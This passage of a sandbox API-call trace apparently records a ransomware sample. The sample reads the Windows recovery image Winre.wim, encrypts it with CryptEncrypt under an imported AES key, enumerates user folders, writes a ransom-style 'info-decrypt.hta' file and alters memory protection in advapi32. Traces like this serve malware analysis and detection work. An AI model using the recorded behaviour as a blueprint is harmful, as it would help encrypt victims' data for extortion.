ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe3214e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe3214e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0155.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f128) returned 1 [0155.857] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x704ec48, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0155.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f0f4) returned 1 [0155.857] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), fInfoLevelId=0x0, lpFileInformation=0x36ca4c0 | out: lpFileInformation=0x36ca4c0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012)) returned 1 [0155.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f0f0) returned 1 [0155.905] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x704eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0155.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f028) returned 1 [0155.905] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x584 [0155.906] GetFileType (hFile=0x584) returned 0x1 [0155.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f024) returned 1 [0155.906] GetFileType (hFile=0x584) returned 0x1 [0155.906] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x704f130 | out: lpFileSizeHigh=0x704f130*=0x0) returned 0xa160012 [0161.535] ReadFile (in: hFile=0x584, lpBuffer=0x22581018, nNumberOfBytesToRead=0xa160012, lpNumberOfBytesRead=0x704f0dc, lpOverlapped=0x0 | out: lpBuffer=0x22581018*, lpNumberOfBytesRead=0x704f0dc*=0xa160012, lpOverlapped=0x0) returned 1 [0207.040] CloseHandle (hObject=0x584) returned 1 [0207.040] CryptAcquireContextW (in: phProv=0x704f07c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x704f07c*=0x7a86d8) returned 1 [0207.041] CryptGenRandom (in: hProv=0x7a86d8, dwLen=0x10, pbBuffer=0x34cc0b4 | out: pbBuffer=0x34cc0b4) returned 1 [0207.256] CryptImportKey (in: hProv=0x7a86d8, pbData=0x3489200, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x704f04c | out: phKey=0x704f04c*=0x77b370) returned 1 [0207.256] CryptContextAddRef (hProv=0x7a86d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.256] CryptContextAddRef (hProv=0x7a86d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.256] CryptDuplicateKey (in: hKey=0x77b370, pdwReserved=0x0, dwFlags=0x0, phKey=0x704f03c | out: phKey=0x704f03c*=0x77b4b0) returned 1 [0207.256] CryptContextAddRef (hProv=0x7a86d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.257] CryptSetKeyParam (hKey=0x77b4b0, dwParam=0x4, pbData=0x34892e0*=0x1, dwFlags=0x0) returned 1 [0207.257] CryptSetKeyParam (hKey=0x77b4b0, dwParam=0x1, pbData=0x34892ac, dwFlags=0x0) returned 1 [0211.474] CryptEncrypt (hKey=0x77b4b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x12e01018*, pdwDataLen=0x704f0a8*=0xa160020, dwBufLen=0xa160020) Thread: id = 139 os_tid = 0x630 [0134.310] SysReAllocStringLen (in: pbstr=0x732f714*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f714*="KERNEL32.DLL") returned 1 [0134.310] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.311] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.313] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.314] SysReAllocStringLen (in: pbstr=0x732f714*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f714*="KERNEL32.DLL") returned 1 [0134.314] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.317] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.317] SysReAllocStringLen (in: pbstr=0x732f6f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f6f0*="KERNEL32.DLL") returned 1 [0134.317] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.320] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0134.322] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.364] SysReAllocStringLen (in: pbstr=0x732f9c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f9c8*="KERNEL32.DLL") returned 1 [0134.364] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.364] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.367] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 140 os_tid = 0x6c0 [0134.332] SysReAllocStringLen (in: pbstr=0x71efb34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x71efb34*="KERNEL32.DLL") returned 1 [0134.332] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.335] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.335] SysReAllocStringLen (in: pbstr=0x71efb34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x71efb34*="KERNEL32.DLL") returned 1 [0134.335] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.339] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.339] SysReAllocStringLen (in: pbstr=0x71efb10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x71efb10*="KERNEL32.DLL") returned 1 [0134.339] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.342] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0134.345] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.346] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef3dc) returned 1 [0134.346] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x71eeee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0134.346] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x71eeeb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0134.346] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x71ef104 | out: lpFindFileData=0x71ef104*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.347] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.347] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0134.347] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0134.347] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0134.347] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0134.348] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.348] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0134.348] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0134.348] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef39c) returned 1 [0134.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef3a8) returned 1 [0134.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef3dc) returned 1 [0134.348] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x71eeee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0134.348] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x71eeeb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0134.348] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x71ef104 | out: lpFindFileData=0x71ef104*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.349] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0134.350] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x71ef114 | out: lpFindFileData=0x71ef114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.350] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef39c) returned 1 [0134.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef3a8) returned 1 [0136.561] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eee9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0136.561] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eee94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0136.561] GetFullPathNameW (in: lpFileName="C:\\Users\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\info-decrypt.hta", lpFilePart=0x0) returned 0x19 [0136.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2fc) returned 1 [0136.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\info-decrypt.hta" (normalized: "c:\\users\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef378 | out: lpFileInformation=0x71ef378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2f8) returned 1 [0136.562] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eee94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0136.562] GetFullPathNameW (in: lpFileName="C:\\Users\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\info-decrypt.hta", lpFilePart=0x0) returned 0x19 [0136.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef230) returned 1 [0136.562] CreateFileW (lpFileName="C:\\Users\\info-decrypt.hta" (normalized: "c:\\users\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4b8 [0136.828] GetFileType (hFile=0x4b8) returned 0x1 [0136.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef22c) returned 1 [0136.829] GetFileType (hFile=0x4b8) returned 0x1 [0136.829] WriteFile (in: hFile=0x4b8, lpBuffer=0x33fe650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x71ef2f4, lpOverlapped=0x0 | out: lpBuffer=0x33fe650*, lpNumberOfBytesWritten=0x71ef2f4*=0x1000, lpOverlapped=0x0) returned 1 [0136.830] WriteFile (in: hFile=0x4b8, lpBuffer=0x33fe650*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x71ef2c8, lpOverlapped=0x0 | out: lpBuffer=0x33fe650*, lpNumberOfBytesWritten=0x71ef2c8*=0x557, lpOverlapped=0x0) returned 1 [0136.830] CloseHandle (hObject=0x4b8) returned 1 [0136.830] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eee18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0136.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2c4) returned 1 [0136.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x33ff66c | out: lpFileInformation=0x33ff66c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0136.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2c0) returned 1 [0136.831] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eed04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0136.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1f8) returned 1 [0136.831] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4b8 [0136.831] GetFileType (hFile=0x4b8) returned 0x1 [0136.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1f4) returned 1 [0136.831] GetFileType (hFile=0x4b8) returned 0x1 [0136.831] GetFileSize (in: hFile=0x4b8, lpFileSizeHigh=0x71ef300 | out: lpFileSizeHigh=0x71ef300*=0x0) returned 0xae [0136.831] ReadFile (in: hFile=0x4b8, lpBuffer=0x33ff870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x71ef2ac, lpOverlapped=0x0 | out: lpBuffer=0x33ff870*, lpNumberOfBytesRead=0x71ef2ac*=0xae, lpOverlapped=0x0) returned 1 [0136.832] CloseHandle (hObject=0x4b8) returned 1 [0139.228] SysReAllocStringLen (in: pbstr=0x71ee608*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x71ee608*="advapi32") returned 1 [0139.228] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.228] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.228] GetLastError () returned 0x0 [0139.229] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.300] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.300] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x71ee4ec, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.301] GetCurrentProcess () returned 0xffffffff [0139.301] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711520, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.301] GetCurrentProcess () returned 0xffffffff [0139.301] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711520, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.302] GetCurrentProcess () returned 0xffffffff [0139.302] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711540, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.302] GetCurrentProcess () returned 0xffffffff [0139.302] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711540, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.303] GetCurrentProcess () returned 0xffffffff [0139.303] NtProtectVirtualMemory (in: 